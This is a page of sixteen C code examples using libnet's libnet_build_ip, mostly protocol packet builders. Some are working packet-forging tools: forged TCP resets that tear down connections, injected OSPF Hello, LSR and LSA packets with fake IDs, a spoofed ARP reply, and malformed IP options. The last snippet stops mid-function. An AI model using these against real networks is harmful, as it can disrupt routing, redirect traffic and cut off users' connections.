Ejemplo n.º 1
0
void nids_killtcp_seq(struct tcp_stream *a_tcp, int seqoff)
{
    char buf[IP_H + TCP_H];

    if (libnetsock == 0)
	return;

    libnet_build_ip(TCP_H, 0, 12345, 0, 64, IPPROTO_TCP, a_tcp->addr.saddr,
		    a_tcp->addr.daddr, 0, 0, buf);
    libnet_build_tcp(a_tcp->addr.source, a_tcp->addr.dest,
	a_tcp->client.first_data_seq + 
		a_tcp->server.count + a_tcp->server.urg_count +
		(seqoff?(a_tcp->server.window/2):0), 
		     0, 0x4, 32000, 0, 0, 0, buf + IP_H);
    libnet_do_checksum(buf, IPPROTO_TCP, TCP_H);
    libnet_write_ip(libnetsock, buf, TCP_H + IP_H);

    libnet_build_ip(TCP_H, 0, 12345, 0, 64, IPPROTO_TCP, a_tcp->addr.daddr,
		    a_tcp->addr.saddr, 0, 0, buf);
    libnet_build_tcp(a_tcp->addr.dest, a_tcp->addr.source,
        a_tcp->server.first_data_seq +
                a_tcp->client.count + a_tcp->client.urg_count +
                (seqoff?(a_tcp->client.window/2):0),

                     0, 0x4, 32000, 0, 0, 0, buf + IP_H);
    libnet_do_checksum(buf, IPPROTO_TCP, TCP_H);
    libnet_write_ip(libnetsock, buf, TCP_H + IP_H);
}
Ejemplo n.º 2
0
int
libnet_build_icmp_redirect(u_char type, u_char code, u_long gateway,
            u_short orig_len, u_char orig_tos, u_short orig_id,
            u_short orig_frag, u_char orig_ttl, u_char orig_prot,
            u_long orig_src, u_long orig_dst, const u_char *orig_payload,
            int payload_s, u_char *buf)
{
    struct libnet_icmp_hdr icmp_hdr;

    if (!buf)
    {
        return (-1);
    }

    icmp_hdr.icmp_type      = type;             /* packet type */
    icmp_hdr.icmp_code      = code;             /* packet code */
    icmp_hdr.hun.gateway    = htonl(gateway);   /* gateway address */

    /*
     *  How convenient!  We can use our build_ip function to tack on the
     *  original header!
     */
    libnet_build_ip(0, orig_tos, orig_id, orig_frag, orig_ttl, orig_prot,
            orig_src, orig_dst, orig_payload, payload_s, buf +
            LIBNET_ICMP_REDIRECT_H);

    memcpy(buf, &icmp_hdr, LIBNET_ICMP_REDIRECT_H);
    return (1);
}
Ejemplo n.º 3
0
int
libnet_build_icmp_unreach(u_char type, u_char code, u_short orig_len,
        u_char orig_tos, u_short orig_id, u_short orig_frag, u_char orig_ttl,
        u_char orig_prot, u_long orig_src, u_long orig_dst, const u_char
        *orig_payload, int payload_s, u_char *buf)
{
    struct libnet_icmp_hdr icmp_hdr;

    if (!buf)
    {
        return (-1);
    }

    icmp_hdr.icmp_type = type;          /* packet type */
    icmp_hdr.icmp_code = code;          /* packet code */
    icmp_hdr.icmp_id   = 0;             /* must be 0 */
    icmp_hdr.icmp_seq  = 0;             /* must be 0 */

    /*
     *  How convenient!  We can use our build_ip function to tack on the
     *  original header!
     */
    libnet_build_ip(0, orig_tos, orig_id, orig_frag, orig_ttl, orig_prot,
            orig_src, orig_dst, orig_payload, payload_s, buf +
            LIBNET_ICMP_UNREACH_H);

    memcpy(buf, &icmp_hdr, LIBNET_ICMP_UNREACH_H);
    return (1);
}
Ejemplo n.º 4
0
int
main(int argc, char **argv)
{
    int warn, sock, len;
    u_char *pack;
    char *from, *to, *adrtr;
    u_long src, dest, advrouter, addaid, addrid;
    u_char auth[2]; 

    if (argc != 4)
	help(argv[0]);

    from = argv[1];
    to = argv[2];
    adrtr = argv[3]; 

    sock = libnet_open_raw_sock(IPPROTO_RAW);
    if (sock == -1) {
	perror("socket");
	exit(-1);
    }

    src = libnet_name_resolve(from, 0);
    dest = libnet_name_resolve(to, 0);
    advrouter = libnet_name_resolve(adrtr, 0);

    addaid = 0xc0ffeeb0;
    addrid = 0xb00f00d0;

    len = LIBNET_IP_H + LIBNET_OSPF_H + LIBNET_AUTH_H + LIBNET_LSR_H;
    pack = (u_char *)malloc(len);
    
    libnet_build_ip(LIBNET_OSPF_H + LIBNET_AUTH_H + LIBNET_LSR_H, 0x00,
            (u_short)rand(), IP_DF, 0xff, IPPROTO_OSPF, src, dest, NULL,
            0, pack);

    memset(auth, 0, sizeof(auth));

    libnet_build_ospf(LIBNET_AUTH_H + LIBNET_LSR_H, LIBNET_OSPF_LSR,
            addrid, addaid, LIBNET_OSPF_AUTH_NULL, NULL, 0, pack +
            LIBNET_IP_H);

    LIBNET_OSPF_AUTHCPY(pack + LIBNET_IP_H + LIBNET_OSPF_H, auth);

    libnet_build_ospf_lsr(LIBNET_LS_TYPE_RTR, 0xffffffff, advrouter, NULL, 0, 
			pack + LIBNET_IP_H + LIBNET_OSPF_H + LIBNET_AUTH_H);

    libnet_do_checksum(pack, IPPROTO_OSPF, len);

    warn = libnet_write_ip(sock, pack, len); 
    if (warn == -1) {
	printf("Error writing packet to wire\n");
	free(pack);
    } else {
	printf("%d bytes written\n", warn);
    }

    free(pack);
    return (0);
}
Ejemplo n.º 5
0
int
main(int argc, char **argv)
{
    int sock, warn, len;
    u_char *pack, *to, *from, *neighbor;
    u_long src, dst, addaid, addrid, nbr,  auth[2];

    if (argc != 4) 
	help(argv[0]);

    from = argv[1];
    to = argv[2];
    neighbor = argv[3];

    len = LIBNET_OSPF_H + LIBNET_HELLO_H + LIBNET_IP_H + LIBNET_AUTH_H;
    pack = (u_char *)malloc(len);

    sock = libnet_open_raw_sock(IPPROTO_RAW);
    if (sock == -1) {
	perror("socket");
   	free(pack);
	exit(-1);
    }


    src = libnet_name_resolve(from, 0);
    dst = libnet_name_resolve(to, 0);
    nbr = libnet_name_resolve(neighbor, 0);

    addrid = 0x23696969;
    addaid = 0xc0ffee00;	/* GENERIC : FAKE : ETC */

    libnet_build_ip(LIBNET_OSPF_H + LIBNET_AUTH_H + LIBNET_HELLO_H, 0x00,
                101, IP_DF, 254, IPPROTO_OSPF, src, dst, NULL, 0, pack);

    auth[0] = 0;
    auth[1] = 0;

    libnet_build_ospf(LIBNET_HELLO_H + LIBNET_AUTH_H, LIBNET_OSPF_HELLO,
                addrid, addaid, LIBNET_OSPF_AUTH_NULL, NULL, 0, pack +
                LIBNET_IP_H); 
  
    LIBNET_OSPF_AUTHCPY(pack + LIBNET_IP_H + LIBNET_OSPF_H, auth);

    libnet_build_ospf_hello(0xffffffff, 2, 0x00, 0x00, 30, src, src, nbr,
                NULL, 0, pack + LIBNET_IP_H + LIBNET_OSPF_H + LIBNET_AUTH_H);

    libnet_do_checksum(pack, IPPROTO_OSPF, len);

    warn = libnet_write_ip(sock, pack, len);
    if (warn != len) {
  	printf("Error sending: %d bytes written : %s\n", warn, strerror(errno));
	free(pack);
	exit(warn);
    } else {
	printf("%d bytes written\n", warn); 
    }
    free(pack);
    return (0);
}
Ejemplo n.º 6
0
int
send_tcp(struct libnet_link_int *l, u_char *device, u_long src_ip, u_short
        src_prt, u_long dst_ip, u_short dst_prt)
{
    int n;
    u_char *buf;

    if (libnet_init_packet(LIBNET_TCP_H + LIBNET_IP_H + LIBNET_ETH_H,
                &buf) == -1)
    {
        perror("no packet memory");
        exit(EXIT_FAILURE);
    }

    /*
     *  Ethernet header
     */
    libnet_build_ethernet(enet_dst, enet_src, ETHERTYPE_IP, NULL, 0, buf);

    libnet_build_ip(LIBNET_TCP_H,
        0,
        242,
        0,
        64,
        IPPROTO_TCP,
        src_ip,
        dst_ip,
        NULL,
        0,
        buf + LIBNET_ETH_H);

    libnet_build_tcp(src_prt,
        dst_prt,
        111111,
        999999,
        TH_SYN,
        32767,
        0,
        NULL,
        0,
        buf + LIBNET_IP_H + LIBNET_ETH_H);

    libnet_do_checksum(buf + LIBNET_ETH_H, IPPROTO_IP, LIBNET_IP_H);
    libnet_do_checksum(buf + LIBNET_ETH_H, IPPROTO_TCP, LIBNET_TCP_H);

    n = libnet_write_link_layer(l, device, buf, LIBNET_ETH_H + LIBNET_IP_H
                + LIBNET_TCP_H);
    if (n != LIBNET_ETH_H + LIBNET_IP_H + LIBNET_TCP_H)
    {
        fprintf(stderr, "Oopz.  Only wrote %d bytes\n", n);
    }
    else
    {
        printf("Wrote %d byte TCP packet through linktype %d\n", n, l->linktype);
    }
    libnet_destroy_packet(&buf);
    return (n);
}
Ejemplo n.º 7
0
int init(void) {
    /* Ethernet header */
    etherhdr.ether_type = ETHERTYPE_IP;      /* Ethernet type IP */
    memset(etherhdr.ether_shost, 0, 6);      /* Ethernet source address */
    memset(etherhdr.ether_dhost, 0xff, 6);   /* Ethernet destination address */

    /* IP header */
    memset(&iphdr.ip_src.s_addr, 0, 4);               /* IP source address 0.0.0.0
                                                       * (pretend to be proxy to
                                                       * avoid being elected as master) */
    inet_aton(MCAST_ALL_HOSTS, &iphdr.ip_dst);        /* IP destination address */
    iphdr.ip_tos = 0;                                 /* IP type of services */
    iphdr.ip_id = (u_int16_t)libnet_get_prand(PRu16); /* IP ID */
    iphdr.ip_p = IPPROTO_IGMP;                        /* IP protocol IGMP */
    iphdr.ip_off = 0;                                 /* IP fragmentation offset */
    iphdr.ip_ttl = 1;                                 /* IP TTL - set to 1 purposely */

    /* IGMP header */
    igmphdr.igmp_type = IGMP_MEMBERSHIP_QUERY;   /* IGMP type */
    igmphdr.igmp_code = 0;                       /* IGMP code */
    inet_aton(MCAST_MDNS, &igmphdr.igmp_group);  /* IGMP group address */

    /* Create packet */
    linkint = libnet_open_link_interface(LINK_INTERFACE, errbuf);

    if (linkint == NULL) {
         return -1;
    }

    igmp_packetlen = LIBNET_ETH_H + LIBNET_IP_H + LIBNET_IGMP_H;

    if (libnet_init_packet(igmp_packetlen, &pkt) == -1) {
        return -1;
    } 

    libnet_build_ethernet(etherhdr.ether_dhost, etherhdr.ether_shost,
        ETHERTYPE_IP, NULL, 0, pkt);

    libnet_build_ip(LIBNET_IGMP_H, iphdr.ip_tos, iphdr.ip_id, iphdr.ip_off,
        iphdr.ip_ttl, iphdr.ip_p, iphdr.ip_src.s_addr, iphdr.ip_dst.s_addr,
        NULL, 0, pkt + LIBNET_ETH_H);

    libnet_build_igmp(igmphdr.igmp_type, igmphdr.igmp_code,
        igmphdr.igmp_group.s_addr, NULL, 0, 
        pkt + LIBNET_ETH_H + LIBNET_IP_H);

    libnet_do_checksum(pkt + LIBNET_ETH_H, IPPROTO_IP, LIBNET_IP_H);

    libnet_do_checksum(pkt + LIBNET_ETH_H, IPPROTO_IGMP, LIBNET_IGMP_H);
}
Ejemplo n.º 8
0
int main(int argc,char *argv[])
{
 char a;
 int sock,r;
 u_long src;
 u_long dst;
 char pktbuf[IP_MAXPACKET];
 char payload[]="ABCDEFGHIJKLMNOPRST";
 u_char options[4];
 struct ipoption ipopt;
 bzero(options,OPT_LEN);
 while((a=getopt(argc,argv,"d:s:h?"))!=EOF)
 {
     switch(a) {
         case 'h' : { usage(); exit(1); }
         case 's' : { src=libnet_name_resolve(optarg,0); break;}
         case 'd' : { dst=libnet_name_resolve(optarg,0); break;}
        }
 }
 sock = libnet_open_raw_sock(IPPROTO_RAW);
 if (sock<0)
 {
 perror("socket");
 exit(1);
 }

 libnet_build_ip(strlen(payload),0,0x1337,0,255,0xaa,src,dst,payload,strlen(payload),pktbuf);
  memcpy(ipopt.ipopt_list, options, OPT_LEN);
  *(ipopt.ipopt_list)     = 0xe4;
  *(ipopt.ipopt_list+1)   = 0;
  *(ipopt.ipopt_list+1)   = 0;
  *(ipopt.ipopt_list+1)   = 0;
  r=libnet_insert_ipo(&ipopt,OPT_LEN,pktbuf);
  if (r <0)
   {
        libnet_close_raw_sock(sock);
        printf("Error ip options insertion failed\n");
        exit(1);
   }
  r=libnet_write_ip(sock,pktbuf,LIBNET_IP_H+OPT_LEN+strlen(payload));
  if (r<0)
  {
   libnet_close_raw_sock(sock);
   printf("Error write_ip \n");
   exit(1);
  }
 libnet_close_raw_sock(sock);
 return 0;
}
Ejemplo n.º 9
0
void write_icmpether(struct libnet_link_int *iface, char *dev, struct eth_pair *dst,
	struct eth_pair *src)
{
    unsigned char pkt[ETH_H + IP_H + ICMP_ECHO_H];
    
    libnet_build_ethernet(dst->eth, src->eth, ETHERTYPE_IP, NULL, 0, pkt);
    libnet_build_ip(ICMP_ECHO_H, 0, 0, 0, 2, IPPROTO_ICMP, src->ip, dst->ip,
	    NULL, 0, pkt + ETH_H);
    libnet_build_icmp_echo(ICMP_ECHO, 0, 0, 0, NULL, 0, pkt + ETH_H + IP_H);
    if(libnet_do_checksum(pkt+ETH_H, IPPROTO_IP, IP_H) == -1)
	perror("ipv4 cksum");
    if(libnet_do_checksum(pkt+ETH_H, IPPROTO_ICMP, ICMP_ECHO_H) == -1)
	perror("ipv4 cksum");
    if(libnet_write_link_layer(iface, dev, pkt, sizeof(pkt)) 
	    != sizeof(pkt))
	perror("Write link layer");
}
Ejemplo n.º 10
0
void write_ipether(struct libnet_link_int *iface, char *dev, struct eth_pair *src)
{
    unsigned char pkt[ETH_H + IP_H + UDP_H];
    struct eth_pair *dst = get_dest();
    
    libnet_build_ethernet(dst->eth, src->eth, ETHERTYPE_IP, NULL, 0, pkt);
    libnet_build_ip(UDP_H, 0, 0, 0, 2, IPPROTO_UDP, src->ip, dst->ip,
	    NULL, 0, pkt + ETH_H);
    libnet_build_udp(rand() % (0xffff-1024) + 1024, rand() % 1024, 
		     NULL, 0, pkt + ETH_H + IP_H);
    if(libnet_do_checksum(pkt+ETH_H, IPPROTO_IP, IP_H) == -1)
	perror("ipv4 cksum");
    if(libnet_do_checksum(pkt+ETH_H, IPPROTO_UDP, UDP_H) == -1)
	perror("ipv4 cksum");
    if(libnet_write_link_layer(iface, dev, pkt, sizeof(pkt)) 
	    != sizeof(pkt))
	perror("Write link layer");
}
/*
 *    Function: void InitInlinePostConfig
 *
 *    Purpose: perform initialization tasks that depend on the configfile
 *
 *    Args: none
 *    
 *    Returns: nothing void function
 */
void InitInlinePostConfig(void)
{
    int tcp_size = 0;
    int icmp_size = 0;

    //printf("InitInline stage 2: InitInlinePostConfig starting...\n");

    /* Let's initialize Libnet, but not if we are in
     * layer 2 resets mode, because we use the link
     * layer then... */
#ifndef IPFW
    if(pv.layer2_resets)
    {
        tcp_size = ETH_H + IP_H + TCP_H;
        icmp_size = 128 + ETH_H;
    }
    else
#endif
    {
        //printf("opening raw socket in IP-mode\n");
 
	if((libnet_nd = libnet_open_raw_sock(IPPROTO_RAW)) < 0)
	{
	    fprintf(stdout, "InitInline: Could not open raw socket for libnet\n");
	    exit(-1);
	}

        tcp_size = IP_H + TCP_H;
        icmp_size = 128;
    }

    /* init */
    l_tcp = calloc(tcp_size, sizeof(char));
    if (l_tcp == NULL)
    {
        perror("InitInline: Could not allocate l_tcp\n");
        exit(-1);
    }
    l_icmp = calloc(icmp_size, sizeof(char));
    if (l_icmp == NULL)
    {
        perror("InitInline: Could not allocate l_icmp\n");
        exit(-1);
    }


#ifndef IPFW
    if(pv.layer2_resets)  
    {    
        /* Building Layer 2 Reset Packets */
        printf("building cached link layer reset packets\n");
   
        libnet_build_ip(TCP_H, 0, libnet_get_prand(PRu16), 0, 255, 
                        IPPROTO_TCP, 0, 0, NULL, 0, l_tcp + ETH_H);

        libnet_build_tcp(0, 0, 0, 0, TH_RST|TH_ACK, 0, 0, NULL, 0,
                         l_tcp + ETH_H + IP_H);

        /* create icmp cached packet */
        libnet_build_ip(ICMP_UNREACH_H, 0, libnet_get_prand(PRu16), 0,
                        255, IPPROTO_ICMP, 0, 0, NULL, 0, l_icmp + ETH_H);
        libnet_build_icmp_unreach(3, 3, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0,
                                  l_icmp + ETH_H + IP_H);
    }
    else 
#endif
    {
        /* Building Socket Reset Packets */ 
        printf("building cached socket reset packets\n"); 
  
        libnet_build_ip(TCP_H, 0, libnet_get_prand(PRu16), 0, 255,
                        IPPROTO_TCP, 0, 0, NULL, 0, l_tcp);

        libnet_build_tcp(0, 0, 0, 0, TH_RST|TH_ACK, 0, 0, NULL, 0,
                         l_tcp + IP_H);

        /* create icmp cached packet */
        libnet_build_ip(ICMP_UNREACH_H, 0, libnet_get_prand(PRu16), 0,
                        255, IPPROTO_ICMP, 0, 0, NULL, 0, l_icmp);
        libnet_build_icmp_unreach(3, 3, 0, 0, 0, 0, 0, 0, 0, 0, NULL, 0,
                                  l_icmp + IP_H);
    }  

}
Ejemplo n.º 12
0
int main(int argc, char *argv[])
{
  // packet type (arp/udp/tcp)
  char type[5];

  // network device
  char *device = "eth0\0";
  struct libnet_link_int *link;

  // Raw socket
  int sock;
  
  // error buffer
  char errbuff[LIBNET_ERRBUF_SIZE];

  // src and dst mac
  u_char dmac[6],smac[6];

  // src and dst ip
  unsigned int src_ip, dst_ip;

  // packet buffer
  unsigned char *packet;

  // packet payload
  char *payload;

  // payload size
  int p_size;

  // bytes send over the wire
  int send;

  // check parameter
  if(argc == 1)
    {
      printf("Usage: %s <arp/udp/tcp>\n",argv[0]);
      exit(0);
    }
  else
    {
      strcpy(type,argv[1]);
    }
  
  // Allocate memory for the payload
  payload = malloc(50);

  // Packets payload
  strcpy(payload,"TEST LIBNET\0");
  packet = NULL;

  // payload size
  p_size = strlen(payload);

  // mac address
  strcpy(smac,SMAC);
  strcpy(dmac,DMAC);

  // ip address in network byte order
  src_ip = inet_addr(SOURCE);
  dst_ip = inet_addr(DEST);

  // Lookup ip addresses
  src_ip = libnet_name_resolve(libnet_host_lookup(src_ip,0),0);
  dst_ip = libnet_name_resolve(libnet_host_lookup(dst_ip,0),0);

  // Build an ARP packet?
  if(!strcmp(type,"arp"))
    {
      // open the network device
      link = libnet_open_link_interface(device,errbuff);
      
      // Failed?
      if(link == NULL)
	{
	  printf("Error while opening device %s!\n%s\n",device,errbuff);
	  exit(1);
	}

      printf("Using device %s\n",device);
      
      // Allocate memory for the packet
      if(libnet_init_packet(LIBNET_ETH_H+LIBNET_ARP_H+p_size,&packet) == -1)
	{
	  printf("libnet_init_packet error!\n%s\n", strerror(errno));
	  exit(1);
	}

      if(packet == NULL)
	{
	  printf("libnet_init_packet error!\n");
	  exit(1);
	}

      // Build ethernet header
      libnet_build_ethernet(dmac,         // destination mac
			    smac,         // source mac
			    ETHERTYPE_ARP,// ethernet packet type
			    NULL,         // pointer to payload
			    0,            // payload size
			    packet        // pointer to packet buffer
			    );

      printf("Sending ARP reply packet %s --> %s\n",SOURCE,DEST);
      
      libnet_build_arp(ARPHRD_ETHER,       // hardware type
		       ETHERTYPE_IP,       // protocol type
		       ETHER_ADDR_LEN,     // hardware address size
		       4,                  // protocol address size
		       ARPOP_REPLY,        // ARP operation
		       smac,               // source mac
		       (u_char *)&src_ip,   // source ip
		       dmac,               // destination mac
		       (u_char *)&dst_ip,   // destination ip
		       NULL,               // pointer to payload
		       0,                  // payload size
		       packet+LIBNET_ETH_H // pointer to packet buffer
		       );

      // Get the packet on the wire
      send = libnet_write_link_layer(link,device,packet,LIBNET_ETH_H+LIBNET_IP_H+LIBNET_TCP_H+p_size);

      // was the complete packet send over the wire?
      if(send < LIBNET_IP_H+LIBNET_TCP_H+p_size)
	{
	  printf("error while writing packet into the socket...\n");
	}

      // close the network device
      libnet_close_link_interface(link);
    }
  else 
    {
      // Open a raw sock
      sock = libnet_open_raw_sock(IPPROTO_RAW);
      
      // Allocate memory for the packet
      if(libnet_init_packet(LIBNET_IP_H+LIBNET_TCP_H+p_size,&packet) == -1)
	{
	  printf("libnet_init_packet error!\n%s\n", strerror(errno));
	  exit(1);
	}

      // Build ip header
      libnet_build_ip(LIBNET_TCP_H+p_size,// packet length without ip header length
		      0,                  // ip type of service
		      242,                // ip id
		      0,                  // fragmentation bit
		      48,                 // time to live
		      IPPROTO_TCP,        // Transport Control Protokoll
		      src_ip,             // source ip
		      dst_ip,             // destination ip
		      NULL,               // pointer to ip payload
		      0,                  // ip options
		      packet              // pointer to packet buffer
		      );


      // Build UDP packet?
      if(!strcmp(type,"udp"))
	{
	  libnet_build_udp(ntohs(SPORT),                          // Source port
			   ntohs(DPORT),                          // destination port
			   payload,                        // pointer to packet payload
			   p_size,                         // payload size
			   packet+LIBNET_IP_H // pointer to packet buffer
			   );
	  
	  printf("Sending UDP packet %s:%d --> %s.%d\n",SOURCE,SPORT,DEST,DPORT);
	}


      // Build TCP/IP packet per default
      else
	{
	  // Build tcp header
	  libnet_build_tcp(ntohs(SPORT),                   // source port
			   ntohs(DPORT),                   // destination port
			   1000000000,                     // acknowledge number
			   1000000000,                     // sequence number
			   TH_ACK,                         // tcp flags
			   1024,                           // window size
			   0,                              // urgent pointer
			   payload,                        // pointer to packet payload
			   p_size,                         // payload size
			   packet+LIBNET_IP_H // pointer to the packet buffer
			   );

	  printf("Sending TCP packet %s:%d --> %s.%d\n",SOURCE,SPORT,DEST,DPORT);
	}

      // Calculize checksum
      libnet_do_checksum(packet,IPPROTO_TCP,LIBNET_IP_H+LIBNET_TCP_H+p_size);

      // Get the packet on the wire
      send = libnet_write_ip(sock,packet,LIBNET_IP_H+LIBNET_TCP_H+p_size);

      // was the complete packet send over the wire?
      if(send < LIBNET_IP_H+LIBNET_TCP_H+p_size)
	{
	  printf("error while writing packet into the socket...\n");
	}

      // close the socket
      libnet_close_raw_sock(sock);
    }

  // free the memory
  //libnet_destroy_packet(packet);
  free(payload);
  free(errbuff);

  return 1;
}
Ejemplo n.º 13
0
int
main(int argc, char **argv)
{
    int sock, warn, len;
    u_char *pack;
    char *from, *to;
    u_long src, dst, addrid, addaid, auth[2];

    if (argc != 3) 
	help(argv[0]);

    len = LIBNET_IP_H + LIBNET_OSPF_H + LIBNET_AUTH_H + LIBNET_LSA_H +
                LIBNET_LS_NET_LEN;
    pack = (u_char *)malloc(len);

    from = argv[1];
    to = argv[2];

    src = libnet_name_resolve(from, 0);
    dst = libnet_name_resolve(to, 0);

    addrid = 0xff00ff00;
    addaid = 0xd00dd00d;

    sock = libnet_open_raw_sock(IPPROTO_RAW);
    if (sock == -1) {
	perror("socket");
	free(pack);
	exit(sock);
    }

    libnet_build_ip(LIBNET_OSPF_H + LIBNET_AUTH_H + LIBNET_LSA_H +
                LIBNET_LS_NET_LEN,
			0x00, 
			(u_short)rand(), 
			IP_DF,
			0xfe,
			IPPROTO_OSPF,
			src,
			dst,
			NULL,
			0,
			pack);

    libnet_build_ospf(LIBNET_AUTH_H + LIBNET_LSA_H + LIBNET_LS_NET_LEN,
			LIBNET_OSPF_LSA,
			addrid,
			addaid,
			LIBNET_OSPF_AUTH_NULL,
			NULL,
			0,
			pack + LIBNET_IP_H);

    memset(auth, 0, sizeof(auth));
    LIBNET_OSPF_AUTHCPY(pack + LIBNET_OSPF_H + LIBNET_IP_H, auth);

    libnet_build_ospf_lsa(40, 
			  0x00, 
			  LIBNET_LS_TYPE_NET,
			  addrid,
			  src, 
			  0xf0f0f00f,
			  LIBNET_LS_NET_LEN,
			  NULL,
			  0,
			  pack + LIBNET_AUTH_H + LIBNET_OSPF_H + LIBNET_IP_H);

    libnet_build_ospf_lsa_net(0xffffff00, 
				0xc0ffee00, 
				NULL,
				0,
				pack + LIBNET_LSA_H + LIBNET_AUTH_H +
                                LIBNET_OSPF_H + LIBNET_IP_H);

    libnet_do_checksum(pack, IPPROTO_OSPF, len);
    libnet_do_checksum(pack + LIBNET_IP_H + LIBNET_OSPF_H + LIBNET_AUTH_H,
                    IPPROTO_OSPF_LSA, LIBNET_LS_NET_LEN + LIBNET_LSA_H);


    warn = libnet_write_ip(sock, pack, len);
    if (warn == -1) {
	printf("Error writing packet to the wire\n");
	free(pack);
	exit(warn);
    }

    printf("%d bytes written\n", warn);
    free(pack);
    return (0);
}
Ejemplo n.º 14
0
int
send_icmp(struct libnet_link_int *l, u_char *device, u_long src_ip, u_long
          dst_ip)
{
    int n;
    u_char *buf;

    if (libnet_init_packet(LIBNET_ICMP_MASK_H + LIBNET_IP_H + LIBNET_ETH_H,
                           &buf) == -1)
    {
        perror("no packet memory");
        exit(EXIT_FAILURE);
    }

    /*
     *  Ethernet header
     */
    libnet_build_ethernet(enet_dst, enet_src, ETHERTYPE_IP, NULL, 0, buf);

    libnet_build_ip(LIBNET_ICMP_MASK_H,
                    0,                      /* IP tos */
                    242,                    /* IP ID */
                    0,                      /* Frag */
                    64,                     /* TTL */
                    IPPROTO_ICMP,           /* Transport protocol */
                    src_ip,                 /* Source IP */
                    dst_ip,                 /* Destination IP */
                    NULL,                   /* Pointer to payload (none) */
                    0,
                    buf + LIBNET_ETH_H);    /* Packet header memory */

    libnet_build_icmp_mask(ICMP_MASKREPLY,  /* type */
                           0,                      /* code */
                           242,                    /* id */
                           0,                      /* seq */
                           0xffffffff,             /* mask */
                           NULL,                   /* payload */
                           0,                      /* payload_s */
                           buf + LIBNET_ETH_H + LIBNET_IP_H);

    libnet_do_checksum(buf + LIBNET_ETH_H, IPPROTO_IP, LIBNET_IP_H);
    libnet_do_checksum(buf + LIBNET_ETH_H, IPPROTO_ICMP, LIBNET_ICMP_MASK_H);

    printf("Packet as it will appear on the wire (give or take some byte ordering):");
    libnet_hex_dump(buf, LIBNET_ETH_H + LIBNET_IP_H + LIBNET_ICMP_MASK_H, 0,
                    stdout);
    printf("\n");

    n = libnet_write_link_layer(l, device, buf, LIBNET_ETH_H + LIBNET_IP_H
                                + LIBNET_ICMP_MASK_H);
    if (n != LIBNET_ETH_H + LIBNET_IP_H + LIBNET_ICMP_MASK_H)
    {
        fprintf(stderr, "Oopz.  Only wrote %d bytes\n", n);
    }
    else
    {
        printf("Wrote %d byte ICMP packet through linktype %d\n", n, l->linktype);
    }
    libnet_destroy_packet(&buf);
    return (n);
}
Ejemplo n.º 15
0
int
main(int argc, char **argv)
{
    int sock, c;
    u_long src_ip, dst_ip;
    u_short src_prt, dst_prt;
    u_char *cp, *buf;
    u_char *payload = "hello world";
    u_char *options = "  This here is a 40-byte IP option list.";
    int payload_s = strlen(payload);
    int option_s  = strlen(options);
    struct ipoption ipopt;

    src_ip  = 0;
    dst_ip  = 0;
    src_prt = 0;
    dst_prt = 0;
    printf("IP + options and TCP + payload packet building/writing test\n");

    while((c = getopt(argc, argv, "d:s:")) != EOF)
    {
        switch (c)
        {
            /*
             *  We expect the input to be of the form `ip.ip.ip.ip.port`.  We
             *  point cp to the last dot of the IP address/port string and
             *  then seperate them with a NULL byte.  The optarg now points to
             *  just the IP address, and cp points to the port.
             */
            case 'd':
                if (!(cp = strrchr(optarg, '.')))
                {
                    usage(argv[0]);
                }
                *cp++ = 0;
                dst_prt = (u_short)atoi(cp);
                if (!(dst_ip = libnet_name_resolve(optarg, 1)))
                {
                    fprintf(stderr, "Bad destination IP address: %s\n", optarg);
                    exit(EXIT_FAILURE);
                }
                break;
            case 's':
                if (!(cp = strrchr(optarg, '.')))
                {
                    usage(argv[0]);
                }
                *cp++ = 0;
                src_prt = (u_short)atoi(cp);
                if (!(src_ip = libnet_name_resolve(optarg, 1)))
                {
                    fprintf(stderr, "Bad source IP address: %s\n", optarg);
                    exit(EXIT_FAILURE);
                }
                break;
        }
    }

    if (!src_ip || !src_prt || !dst_ip || !dst_prt)
    {
        usage(argv[0]);
        exit(EXIT_FAILURE);
    }

    /*
     *  Get packet memory.  Let's get plenty.
     */
    buf = malloc(IP_MAXPACKET);
    if (!buf)
    {
        perror("No memory for packet");
        exit(EXIT_FAILURE);
    }

    /*
     *  Open our raw IP socket and set IP_HDRINCL.
     */
    sock = libnet_open_raw_sock(IPPROTO_RAW);
    if (sock == -1)
    {
        perror("No socket");
        exit(EXIT_FAILURE);
    }
    
    /*
     *  Build the IP header (shown exploded for commenting).
     */
    libnet_build_ip(LIBNET_TCP_H + payload_s,/* Size of the payload */
            0,                              /* IP tos */
            242,                            /* IP ID */
            0,                              /* Frag stuff */
            48,                             /* TTL */
            IPPROTO_TCP,                    /* Transport protocol */
            src_ip,                         /* Source IP */
            dst_ip,                         /* Destination IP */
            NULL,                           /* Pointer to payload (none) */
            0,
            buf);                           /* Packet header memory */

    /*
     *  Build the TCP header.
     */
    libnet_build_tcp(src_prt,               /* Source TCP port */
            dst_prt,                        /* Destination TCP port */
            11111,                          /* Sequence number */
            99999,                          /* Acknowledgement number */
            TH_SYN|TH_ACK,                  /* Control flags */
            1024,                           /* Window size */
            0,                              /* Urgent pointer */
            payload,                        /* Pointer to payload */
            payload_s,
            buf + LIBNET_IP_H);             /* Packet header memory */

    /*
     *  Calculate the TCP header checksum (IP header checksum is *always* done
     *  by the kernel.
     */
    libnet_do_checksum(buf, IPPROTO_TCP, LIBNET_TCP_H + payload_s);

    memcpy(ipopt.ipopt_list, options, option_s);
    *(ipopt.ipopt_list)     = IPOPT_SECURITY;
    *(ipopt.ipopt_list + 1) = 1;

    /*
     *  Insert the IP options.
     */
    c = libnet_insert_ipo(&ipopt,           /* pointer to ipopt struct */
            option_s,                       /* Length of option list */
            buf);                           /* Packet header memory */

    if (c == -1)
    {
        fprintf(stderr, "Can't add options, discarding them.\n");
    }

    /*
     *  Write the packet to the network.
     */
    c = libnet_write_ip(sock, buf, LIBNET_TCP_H + LIBNET_IP_H + payload_s
                + option_s);
    if (c < LIBNET_TCP_H + LIBNET_IP_H + payload_s + option_s)
    {
        fprintf(stderr, "libnet_write_ip: %s\n", strerror(errno));
    }
    printf("Completed, wrote %d bytes\n", c);
    free(buf);

    return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}
Ejemplo n.º 16
0
int main(int argc, char *argv[]) {
   u_long dest_ip;
   u_short dest_port;
   u_char errbuf[LIBNET_ERRBUF_SIZE], *packet;
   int opt, network, byte_count, packet_size = LIBNET_IP_H + LIBNET_TCP_H;

   if(argc < 3)
   {
      printf("Usage:\n%s\t <target host> <target port>\n", argv[0]);
      exit(1);
   }

   dest_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE); // the host 
   dest_port = (u_short) atoi(argv[2]); // the port 


